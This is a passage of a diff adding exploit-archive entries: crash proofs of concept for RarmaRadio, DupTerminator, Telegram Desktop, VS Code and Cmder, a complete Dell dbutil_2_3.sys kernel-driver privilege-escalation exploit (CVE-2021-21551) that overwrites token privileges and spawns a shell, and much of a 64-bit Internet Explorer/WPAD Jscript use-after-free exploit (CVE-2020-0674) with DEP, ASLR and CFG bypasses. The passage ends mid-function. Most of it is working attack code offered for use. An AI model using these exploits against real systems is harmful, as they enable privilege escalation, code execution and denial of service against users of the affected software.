+# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
+# Date: 2021-05-25
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
+# Version: 2.75.8
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program RarmaRadio
+# Click in Edit and select Settings
+# Click in Network option
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Lambda.txt"
+# Paste the content in the fields Username, Server, Port and User Agent
+# Click in OK
+# End :)
+
+
+buffer = 'Ñ' * 100000
+
+try:
+ file = open("Lambda.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49917.py b/exploits/windows/dos/49917.py
new file mode 100755
index 000000000..f7205fc8d
--- /dev/null
+++ b/exploits/windows/dos/49917.py
@@ -0,0 +1,27 @@
+# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
+# Date: 2021-05-28
+# Author: Brian Rodríguez
+# Software Site: https://sourceforge.net/projects/dupterminator/
+# Version: 1.4.5639.37199
+# Category: DoS (Windows)
+
+##### Vulnerability #####
+
+DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Windows 10.
+
+##### PoC #####
+
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/windows/dos/50247.py b/exploits/windows/dos/50247.py
new file mode 100755
index 000000000..1c6eeef93
--- /dev/null
+++ b/exploits/windows/dos/50247.py
@@ -0,0 +1,36 @@
+# Exploit Title: Telegram Desktop 2.9.2 - Denial of Service (PoC)
+# Exploit Author: Aryan Chehreghani
+# Date: 2021-08-30
+# Vendor Homepage: https://telegram.org
+# Software Link: https://telegram.org/dl/desktop/win64
+# Tested Version: 2.9.2 x64
+# Tested on OS: Windows 10 Enterprise
+
+# [ About App ]
+
+#Telegram is a messaging app with a focus on speed and security, it’s super-fast, simple and free,
+#You can use Telegram on all your devices at the same time — your messages sync seamlessly across any number of your phones, tablets or computers.
+#Telegram has over 500 million monthly active users and is one of the 10 most downloaded apps in the world.
+#With Telegram, you can send messages, photos, videos and files of any type (doc, zip, mp3, etc), as well as create groups for up to 200,000 people or channels for broadcasting to unlimited audiences.
+#You can write to your phone contacts and find people by their usernames. As a result,
+#Telegram is like SMS and email combined — and can take care of all your personal or business messaging needs,
+#Telegram is support end-to-end encrypted voice and video calls, as well as voice chats in groups for thousands of participants.
+
+# [ POC ]
+
+# 1.Run the python script, it will create a new file "output.txt"
+# 2.Run Telegram Desktop and go to "Saved Messages"
+# 3.Copy the content of the file "output.txt"
+# 4.Paste the content of dos.txt into the "Write a message..."
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 9000000
+try:
+ f=open("output.txt","w")
+ print("[!] Creating %s bytes DOS payload...." %len(buffer))
+ f.write(buffer)
+ f.close()
+ print("[!] File Created !")
+except:
+ print("File cannot be created")
\ No newline at end of file
diff --git a/exploits/windows/local/49882.ps1 b/exploits/windows/local/49882.ps1
new file mode 100644
index 000000000..4b8d1b1c3
--- /dev/null
+++ b/exploits/windows/local/49882.ps1
@@ -0,0 +1,45 @@
+# Exploit Tittle: Visual Studio Code 1.47.1 - Denial of Service (Poc)
+# Exploit Author: H.H.A.Ravindu Priyankara
+# Category: Denial of Service(DOS)
+# Tested Version:1.47.1
+# Vendor: Microsoft
+# Software Download Link:https://code.visualstudio.com/updates/
+
+Write-Host "
+ * *
+ *-------------------------------------------------------------------------------------------------------*
+ | |
+ |" -ForegroundColor Yellow -NoNewline; Write-Host " Exploit Tittle :-" -ForegroundColor Green -NoNewline; Write-Host " Visual Studio Code (VS Code) Denial of Service " -ForegroundColor Cyan -NoNewline; Write-Host " |
+ | |
+ |" -ForegroundColor Yellow -NoNewline; Write-Host " Author :-" -ForegroundColor Green -NoNewline; Write-Host " H.H.A.Ravindu.Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
+ | |
+ |" -ForegroundColor Yellow -NoNewline; Write-Host " Github :-" -ForegroundColor Green -NoNewline; Write-Host " https://github.com/Ravindu-Priyankara " -ForegroundColor Cyan -NoNewline; Write-Host " |
+ | |
+ |" -ForegroundColor Yellow -NoNewline; Write-Host " Youtube :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.youtube.com/channel/UCKD2j5Mbr15RKaXBSIXwvMQ " -ForegroundColor Cyan -NoNewline; Write-Host " |
+ | |
+ |" -ForegroundColor Yellow -NoNewline; Write-Host " Linkedin :-"-ForegroundColor Green -NoNewline; Write-Host " https://www.linkedin.com/in/ravindu-priyankara-b77753209/ " -ForegroundColor Cyan -NoNewline; Write-Host " |
+ *-------------------------------------------------------------------------------------------------------*"-ForegroundColor Yellow
+
+[string]$Userinpts = Read-Host -Prompt "Enter Run or Stop:-"
+if ($Userinpts -eq "Run") {
+ Write-Output "Yeah I Know"
+ while ($True) {
+ $name = "AAAAAAA"
+ $name * 1000000
+ }
+ #or
+ #$name = "AAAAAAA"
+ #$name * 1000000
+}
+if ($Userinpts -eq "Stop") {
+ exit
+}
+
+#==========================================================
+#==================== solution ============================
+#==========================================================
+
+#Update Your Visual Studio Code Application
+# 1.47.1 version ==> 1.56.0 version
+
+#==========================================================
\ No newline at end of file
diff --git a/exploits/windows/local/49893.c++ b/exploits/windows/local/49893.c++
new file mode 100644
index 000000000..052ba56f3
--- /dev/null
+++ b/exploits/windows/local/49893.c++
@@ -0,0 +1,219 @@
+# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
+# Date: 10/05/2021
+# Exploit Author: Paolo Stagno aka VoidSec
+# Version: <= 2.3
+# CVE: CVE-2021-21551
+# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
+# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/
+
+#include
+#include
+#include
+#include
+#include
+
+#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
+#define SystemHandleInformation 0x10
+#define SystemHandleInformationSize 1024 * 1024 * 2
+
+// define the buffer structure which will be sent to the vulnerable driver
+typedef struct Exploit
+{
+ uint64_t Field1; // "padding" can be anything
+ void* Field2; // where to write
+ uint64_t Field3; // must be 0
+ uint64_t Field4; // value to write
+};
+
+typedef struct outBuffer
+{
+ uint64_t Field1;
+ uint64_t Field2;
+ uint64_t Field3;
+ uint64_t Field4;
+};
+
+// define a pointer to the native function 'NtQuerySystemInformation'
+using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
+ ULONG SystemInformationClass,
+ PVOID SystemInformation,
+ ULONG SystemInformationLength,
+ PULONG ReturnLength);
+
+// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
+{
+ USHORT UniqueProcessId;
+ USHORT CreatorBackTraceIndex;
+ UCHAR ObjectTypeIndex;
+ UCHAR HandleAttributes;
+ USHORT HandleValue;
+ PVOID Object;
+ ULONG GrantedAccess;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
+
+// define the SYSTEM_HANDLE_INFORMATION structure
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+ ULONG NumberOfHandles;
+ SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
+} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
+
+int main(int argc, char** argv)
+{
+
+ // open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
+ HANDLE device = ::CreateFileW(
+ L"\\\\.\\DBUtil_2_3",
+ GENERIC_WRITE | GENERIC_READ,
+ NULL,
+ nullptr,
+ OPEN_EXISTING,
+ NULL,
+ NULL);
+ if (device == INVALID_HANDLE_VALUE)
+ {
+ std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
+ return -1;
+ }
+ std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";
+
+ // resolve the address of NtQuerySystemInformation and assign it to a function pointer
+ pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
+ if (!NtQuerySystemInformation)
+ {
+ std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
+ return -1;
+ }
+ std::cout << "[+] Resolved NtQuerySystemInformation!\n";
+
+ // open the current process token - it will be used to retrieve its kernelspace address later
+ HANDLE currentProcess = ::GetCurrentProcess();
+ HANDLE currentToken = NULL;
+ bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, ¤tToken);
+ if (!success)
+ {
+ std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
+ return -1;
+ }
+ std::cout << "[+] Opened a handle to the current process token!\n";
+
+ // allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
+ PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
+
+ // call NtQuerySystemInformation and fill the handleTableInformation structure
+ ULONG returnLength = 0;
+ NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
+
+ uint64_t tokenAddress = 0;
+ // iterate over the system's handle table and look for the handles beloging to our process
+ for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
+ {
+ SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
+ // if it finds our process and the handle matches the current token handle we already opened, print it
+ if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken)
+ {
+ tokenAddress = (uint64_t)handleInfo.Object;
+ std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
+ }
+ }
+
+ outBuffer buffer =
+ {
+ 0,
+ 0,
+ 0,
+ 0
+ };
+
+ /*
+ dt nt!_SEP_TOKEN_PRIVILEGES
+ +0x000 Present : Uint8B
+ +0x008 Enabled : Uint8B
+ +0x010 EnabledByDefault : Uint8B
+
+ We've added +1 to the offsets to ensure that the low bytes part are 0xff.
+ */
+
+ // overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
+ Exploit exploit =
+ {
+ 0x4141414142424242,
+ (void*)(tokenAddress + 0x40),
+ 0x0000000000000000,
+ 0xffffffffffffffff
+ };
+
+ // overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
+ Exploit exploit2 =
+ {
+ 0x4141414142424242,
+ (void*)(tokenAddress + 0x48),
+ 0x0000000000000000,
+ 0xffffffffffffffff
+ };
+
+ // overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
+ Exploit exploit3 =
+ {
+ 0x4141414142424242,
+ (void*)(tokenAddress + 0x50),
+ 0x0000000000000000,
+ 0xffffffffffffffff
+ };
+
+ DWORD bytesReturned = 0;
+ success = DeviceIoControl(
+ device,
+ IOCTL_CODE,
+ &exploit,
+ sizeof(exploit),
+ &buffer,
+ sizeof(buffer),
+ &bytesReturned,
+ nullptr);
+ if (!success)
+ {
+ std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
+ return -1;
+ }
+ std::cout << "[+] Successfully overwritten current token 'Present' field!\n";
+
+ success = DeviceIoControl(
+ device,
+ IOCTL_CODE,
+ &exploit2,
+ sizeof(exploit2),
+ &buffer,
+ sizeof(buffer),
+ &bytesReturned,
+ nullptr);
+ if (!success)
+ {
+ std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
+ return -1;
+ }
+ std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";
+
+ success = DeviceIoControl(
+ device,
+ IOCTL_CODE,
+ &exploit3,
+ sizeof(exploit3),
+ &buffer,
+ sizeof(buffer),
+ &bytesReturned,
+ nullptr);
+ if (!success)
+ {
+ std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl;
+ return -1;
+ }
+ std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
+ std::cout << "[+] Token privileges successfully overwritten!\n";
+ std::cout << "[+] Spawning a new shell with full privileges!\n";
+
+ system("cmd.exe");
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/50401.txt b/exploits/windows/local/50401.txt
new file mode 100644
index 000000000..058cf1b0b
--- /dev/null
+++ b/exploits/windows/local/50401.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
+# Date: 2021-10-07
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://cmder.net
+# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
+# Version: v1.3.18
+# Tested on: Windows 10
+
+# [About - Cmder Console Emulator] :
+
+#Cmder is a software package created over absence of usable console emulator on Windows.
+#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
+
+# [Security Issue] :
+
+#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
+#E.g λ cmder.cmd
+
+# [POC] :
+
+PAYLOAD=chr(235) + "\\CMDER"
+PAYLOAD = PAYLOAD * 3000
+with open("cmder.cmd", "w") as f:
+f.write(PAYLOAD)
\ No newline at end of file
diff --git a/exploits/windows_x86-64/local/49863.js b/exploits/windows_x86-64/local/49863.js
new file mode 100644
index 000000000..7264c40a9
--- /dev/null
+++ b/exploits/windows_x86-64/local/49863.js
@@ -0,0 +1,1213 @@
+# Exploit Title: Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free
+# Date: 2021-05-04
+# Exploit Author: deadlock (Forrest Orr)
+# Vendor Homepage: https://www.microsoft.com/
+# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx
+# Versions: IE 8-11 (64-bit) as well as the WPAD service (64-bit) on Windows 7 and 8.1 x64
+# Tested on: Windows 7 x64, Windows 8.1 x64
+# CVE: CVE-2020-0674
+# Bypasses: DEP, ASLR, CFG
+# Original (IE-only/Windows 7-only) exploit credits: maxpl0it
+# Full explain chain writeup: https://github.com/forrest-orr/DoubleStar
+
+/*
+________ ___. .__ _________ __
+\______ \ ____ __ __\_ |__ | | ____ / _____/_/ |_ _____ _______
+ | | \ / _ \ | | \| __ \ | | _/ __ \ \_____ \ \ __\\__ \ \_ __ \
+ | ` \( <_> )| | /| \_\ \| |__\ ___/ / \ | | / __ \_| | \/
+/_______ / \____/ |____/ |___ /|____/ \___ > /_______ / |__| (____ /|__|
+ \/ \/ \/ \/ \/
+Windows 8.1 IE/Firefox RCE -> Sandbox Escape -> SYSTEM EoP Exploit Chain
+
+ ______________
+ | Remote PAC |
+ |____________|
+ ^
+ | HTTPS
+_______________ RPC/ALPC _______________ RPC/ALPC _______________
+| firefox.exe | ----------> | svchost.exe | -----------> | spoolsv.exe |
+|_____________| |_____________| <----------- |_____________|
+ | RPC/Pipe
+ |
+ _______________ |
+ | malware.exe | <---| Execute impersonating NT AUTHORY\SYSTEM
+ |_____________|
+
+~
+
+Component
+
+JavaScript file containing CVE-2020-0674 UAF targetting IE8/11 and WPAD 64-bit
+on Windows 7 and 8.1 x64. It may be used as an alternative RCE attack vector in
+the exploit chain (in which case it should be used in conjunction with the
+stage two WPAD sandbox escape shellcode), as a PAC file (see settings) or a
+stand-alone IE8/11 64-bit exploit. Note that if used as the initial RCE in the
+full exploit chain, Windows 7 is unsupported by the required stage two WPAD
+sandbox escape shellcode.
+
+________________ CVE-2020-0674 _______________________ RPC/ALPC _______________
+| iexplore.exe | -------------> | WPAD sandbox escape | ----------> | svchost.exe |
+|______________| | shellcode (heap) | |_____________|
+ |_____________________|
+
+~
+
+Overview
+
+This is a 64-bit adaptation of CVE-2020-0674 which can exploit both IE8/11
+64-bit as well as the WPAD service on Windows 7 and 8.1 x64. It has bypasses
+for DEP, ASLR, and CFG. It uses dynamic ROP chain creation for its RIP
+hijack and stack pivot. Notably, this exploit does not contain bypasses for
+Windows Exploit Guard or EMET 5.5 and does not work on IE11 or WPAD in
+Windows 10.
+
+~
+
+Design
+
+The UAF is a result of two untracked variables passed to a comparator for the
+Array.sort method, which can then be used to reference VAR structs within
+allocated GcBlock regions which can subsequently be freed via garbage
+collection. Control of the memory of VAR structs with active JS var
+references in the runtime script is then used for arbitrary read (via BSTR)
+and addrof primitives.
+
+Ultimately the exploit aims to use KERNEL32.DLL!VirtualProtect to disable DEP
+on a user defined shellcode stored within a BSTR on the heap. This is achieved
+through use of NTDLL.DLL!NtContinue, an artificial stack (built on the heap)
+and a dynamically resolved stack pivot ROP gadget.
+
+NTDLL.DLL!NtContinue --------------------> RIP = | MOV RSP, R11; RET
+ RCX = Shellcode address
+ RDX = Shellcode size
+ R8 = 0x40
+ R9 = Leaked address of BSTR to hold out param
+ RSP = Real stack pointer
+ R11 = Artificial stack
+|-----------------------------| ^
+| 2MB stack space (heap) | |
+|-----------------------------| |
+| Heap header/BSTR len align | |
+|-----------------------------| |
+| KERNEL32.DLL!VirtualProtect | <----------|
+|-----------------------------|
+| Shellcode return address ]
+|-----------------------------|
+
+The logic flow is:
+1. A fake object with a fake vtable is constructed containing the address
+ of NTDLL.DLL!NtContinue as its "typeof" method pointer. This primitive
+ is used for RIP hijack in conjunction with a pointer to a specially
+ crafted CONTEXT structure in RCX as its parameter.
+2. NtContinue changes RIP to a stack pivot gadget and sets up the parameters
+ to KERNEL32.DLL!VirtualProtect.
+3. The address of VirtualProtect is the first return address to be
+ consumed on the new (artificial) stack after the stack pivot.
+4. VirtualProtect disables DEP on the shellcode region and returns to that
+ same (now +RWX) shellcode address stored as the second return address on
+ the pivoted stack.
+
+Notably, the stack pivot was needed here due to the presence of CFG on
+Windows 8.1, which prevents NtContinue from being used to change RSP to an
+address which falls outside the stack start/end addresses specified in the
+TEB. On Windows 7 this is a non-issue. Furthermore, it required a leak of RSP
+to be planted in the CONTEXT structure so that NtContinue would consider its
+new RSP valid.
+
+The exploit will not work on Windows 10 due to enhanced protection by CFG:
+Windows 10 has blacklisted NTDLL.DLL!NtContinue to CFG by default.
+
+~
+
+Credits
+
+maxpl0it - for doing the original analysis and PoC for CVE-2020-0674
+ on IE8/11 on Windows 7 x64.
+
+HackSys Team - for tips on the WPAD service and low level JS debugging.
+
+*/
+
+////////
+////////
+// Global settings
+////////
+
+var PayloadType = "shellcode"; // Can be "shellcode" or "winexec"
+var CommandStr = "\u3a63\u775c\u6e69\u6f64\u7377\u6e5c\u746f\u7065\u6461\u652e\u6578"; // The ASCII string to be executed via WinExec if the relevant payload type is selected - C:\Windows\notepad.exe
+var WindowsVersion = 8.1; // Can be 8.1 or 7. Only the 64-bit versions of these OS are supported.
+var PacFile = false;
+var EnableDebug = false;
+var EnableTimers = false;
+var AlertOutput = false;
+
+////////
+////////
+// Stack-sensitive array initialization logic
+////////
+
+var SortArray = new Array(); // Initializing this locally rather than globally causes stack issues, particularly in regards to WPAD.
+for(var i = 0; i <= 150; i++) SortArray[i] = [0, 0]; // An array of arrays to be sorted by glitched sort comparator
+
+////////
+////////
+// Debug/timer code
+////////
+
+var TimeStart;
+var ReadCount;
+var ScriptTimeStart = new Date().getTime();
+
+function StartTimer() {
+ ReadCount = 0;
+ TimeStart = new Date().getTime();
+}
+
+function EndTimer(Message) {
+ var TotalTime = (new Date().getTime() - TimeStart);
+
+ if(EnableTimers) {
+ if(AlertOutput) {
+ alert("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
+ }
+ else {
+ console.log("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
+ }
+ }
+}
+
+function DebugLog(Message) {
+ if(EnableDebug) { // When debug is enabled the distinction between "stack overflow" and "out of memory" errors are lost: console always determines there to be an "out of memory" condition even though this only sppears after scoping of SortDepth is changed.
+ if(AlertOutput) {
+ alert(Message);
+ }
+ else {
+ console.log(Message); // In IE, console only works if devtools is open.
+ }
+ }
+}
+
+////////
+////////
+// UAF/untracked variable creation code
+////////
+
+var UntrackedVarSet;
+var VarSpray;
+var VarSprayCount = 20000; // 200 GcBlocks
+var NameListAnchors;
+var NameListAnchorCount = 0; // The larger this number the more reliable the exploit on Windows 8.1 where LFH cannot easily re-claim
+var SortDepth = 0;
+
+function GlitchedComparator(Untracked1, Untracked2) {
+ Untracked1 = VarSpray[SortDepth*2];
+ Untracked2 = VarSpray[SortDepth*2 + 1];
+
+ if(SortDepth >= 150) {
+ VarSpray = new Array(); // Erase references to sprayed vars within GcBlocks
+ CollectGarbage(); // Free the GcBlocks
+ UntrackedVarSet.push(Untracked1);
+ UntrackedVarSet.push(Untracked2);
+ }
+ else {
+ SortDepth += 1;
+
+ // There is a difference between the stack size between WPAD and Internet Explorer. In IE, a stack overflow exception will occur around depth 250 however in WPAD it will occur on a depth of less than 150, ensuring a stack overflow exception/alert will be thrown in the exploit. This try/catch in conjunction with a global initialization of the sort array allows the depth to be sufficient to produce an untracked var which will overlap with the type confusion offset in the re-claimed GcBlock.
+
+ try {
+ SortArray[SortDepth].sort(GlitchedComparator);
+ }
+ catch(ex) {
+ VarSpray = new Array(); // Erase references to sprayed vars within GcBlocks
+ CollectGarbage(); // Free the GcBlocks
+ }
+
+ UntrackedVarSet.push(Untracked1);
+ UntrackedVarSet.push(Untracked2);
+ }
+
+ return 0;
+}
+
+function NewUntrackedVarSet() {
+ SortDepth = 0;
+ VarSpray = new Array();
+ NameListAnchors = new Array();
+ UntrackedVarSet = new Array();
+ for(var i = 0; i < NameListAnchorCount; i++) NameListAnchors[i] = new Object(); // Overlay must happen before var spray
+ for(var i = 0; i < VarSprayCount; i++) VarSpray[i] = new Object();
+ CollectGarbage();
+ SortArray[0].sort(GlitchedComparator); // Two untracked vars will be passed to this method by the JS engine
+}
+
+////////
+////////
+// UAF re-claim/mutable variable code (used for arbitrary read)
+////////
+
+var AnchorObjectsBackup;
+var LeakedAnchorIndex = -1;
+var SizerPropName = Array(570).join('A');
+var MutableVar;
+var ReClaimNameList;
+var InitialReClaim = true;
+
+function ReClaimIndexNameList(Value, PropertyName) {
+ CollectGarbage(); // Cleanup - note that removing this has not damaged stability of the exploit in any of my own tests and its removal significantly improved exploit performance (each arbitrary read is about twice as fast). I've left it here from maxspl0it's original version of the exploit to ensure stability.
+ AnchorObjectsBackup[LeakedAnchorIndex] = null; // Delete the anchor associated with the leaked NameList allocation
+ CollectGarbage(); // Free the leaked NameList
+ AnchorObjectsBackup[LeakedAnchorIndex] = new Object();
+ AnchorObjectsBackup[LeakedAnchorIndex][SizerPropName] = 1; // 0x239 property name size for 0x970 NameList allocation size
+ AnchorObjectsBackup[LeakedAnchorIndex]["BBBBBBBBBBB"] = 1; // 11*2 = 22 in 64-bit, 9*2 = 18 bytes in 32-bit
+ AnchorObjectsBackup[LeakedAnchorIndex]["\u0005"] = 1;
+ AnchorObjectsBackup[LeakedAnchorIndex][PropertyName] = Value; // The mutable variable
+ ReadCount++;
+}
+
+function ReClaimBackupNameLists(Value, PropertyName) {
+ var PrecisionReClaimAllocCount = 500; // This is the number of re-claim attempts that are needed for a precision re-claim of a single freed region, not hundreds such as in the case of the GcBlock/type confusion re-claims. On IE8/11 300 is plenty, on WPAD 500 seems to be more stable.
+ CollectGarbage(); // Cleanup
+
+ if(InitialReClaim) {
+ AnchorObjectsBackup[LeakedAnchorIndex] = null;
+ InitialReClaim = false;
+ PrecisionReClaimAllocCount -= 1;
+ AnchorObjectsBackup[LeakedAnchorIndex] = new Object(); // Clog the index
+ }
+
+ for(var i = 0; i < PrecisionReClaimAllocCount; i++) {
+ if(i != LeakedAnchorIndex) AnchorObjectsBackup[i] = null;
+ }
+
+ CollectGarbage(); // Free the leaked NameList
+
+ for(var i = 0; i < PrecisionReClaimAllocCount; i++) {
+ if(i != LeakedAnchorIndex) AnchorObjectsBackup[i] = new Object();
+ AnchorObjectsBackup[i][SizerPropName] = 1; // 0x239 property name size for 0x970 NameList allocation size
+ AnchorObjectsBackup[i]["BBBBBBBBBBB"] = 1; // 11*2 = 22 in 64-bit, 9*2 = 18 bytes in 32-bit
+ AnchorObjectsBackup[i]["\u0005"] = 1;
+ AnchorObjectsBackup[i][PropertyName] = Value; // The mutable variable
+ }
+
+ ReadCount++;
+}
+
+function CreateVar64(Type, ObjPtrLow, ObjPtrHigh, NextPtrLow, NextPtrHigh) {
+ var CharCodes = new Array();
+
+ CharCodes.push(
+ // Type
+ Type, 0, 0, 0,
+ // Object pointer
+ ObjPtrLow & 0xffff, (ObjPtrLow >> 16) & 0xffff, ObjPtrHigh & 0xffff, (ObjPtrHigh >> 16) & 0xffff,
+ // Next pointer
+ NextPtrLow & 0xffff, (NextPtrLow >> 16) & 0xffff, NextPtrHigh & 0xffff, (NextPtrHigh >> 16) & 0xffff);
+
+ return String.fromCharCode.apply(null, CharCodes);
+}
+
+function LeakByte64(Address) {
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 2, Address.high, 0, 0)); // +2 for BSTR length adjustment (only a WORD at a time can be cleanly read despite being a 32-bit field)
+ return (MutableVar.length >> 15) & 0xff; // Shift to align and get the byte.
+}
+
+function LeakWord64(Address) {
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 2, Address.high, 0, 0)); // +2 for BSTR length adjustment (only a WORD at a time can be cleanly read despite being a 32-bit field)
+ return ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+}
+
+function LeakDword64(Address) {
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 2, Address.high, 0, 0)); // +2 for BSTR length adjustment (only a WORD at a time can be cleanly read despite being a 32-bit field)
+ var LowWord = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 4, Address.high, 0, 0)); // +4 for BSTR length adjustment (only a WORD at a time can be cleanly read despite being a 32-bit field)
+ var HighWord = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ return LowWord + (HighWord << 16);
+}
+
+function LeakQword64(Address) {
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 2, Address.high, 0, 0));
+ var LowLow = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 4, Address.high, 0, 0));
+ var LowHigh = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 6, Address.high, 0, 0));
+ var HighLow = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ ReClaimNameList(0, CreateVar64(0x8, Address.low + 8, Address.high, 0, 0));
+ var HighHigh = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ return MakeQword(HighLow + (HighHigh << 16), LowLow + (LowHigh << 16));
+}
+
+function LeakObjectAddress64(ObjVarAddress, ObjVarValue) { // This function does not always work, there are some edge cases. For example if a BSTR is declared var A = "123"; it works fine. However, var A = "1"; A += "23"; resuls in multiple layers of VARs referencing VARs and this function will no longer get the actual BSTR address.
+ ReClaimNameList(ObjVarValue, CreateVar64(0x8, ObjVarAddress.low + 8 + 2, ObjVarAddress.high, 0, 0));
+ var LowLow = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ ReClaimNameList(ObjVarValue, CreateVar64(0x8, ObjVarAddress.low + 8 + 4, ObjVarAddress.high, 0, 0));
+ var LowHigh = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ ReClaimNameList(ObjVarValue, CreateVar64(0x8, ObjVarAddress.low + 8 + 6, ObjVarAddress.high, 0, 0));
+ var HighLow = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ ReClaimNameList(ObjVarValue, CreateVar64(0x8, ObjVarAddress.low + 8 + 8, ObjVarAddress.high, 0, 0));
+ var HighHigh = ((MutableVar.length >> 15) & 0xff) + (((MutableVar.length >> 23) & 0xff) << 8);
+ var DerefObjVarAddress = MakeQword(HighLow + (HighHigh << 16), LowLow + (LowHigh << 16) + 8);
+ return LeakQword64(DerefObjVarAddress); // The concept here is to turn the property name (the mutable var) into a BSTR VAR pointing at its own VVAL (which starts with another, real VAR). The real VAR can be set dynamically to the address of the desired object. So there are two stages: first to read the object pointer out of the VAR within the final VVAL, and then to leak the object pointer of the VAR it is pointing to (skipping +8 over its Type field)
+}
+
+////////
+////////
+// PE parsing/EAT and IAT resolution code
+////////
+
+function ResolveExport64(ModuleBase, TargetExportNameTable) {
+ var FileHdrRva = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + 0x3c));
+ var EATRva = LeakDword64(MakeQword(ModuleBase.high, ModuleBase.low + FileHdrRva + 0x88));
+
+ if(EATRva) {
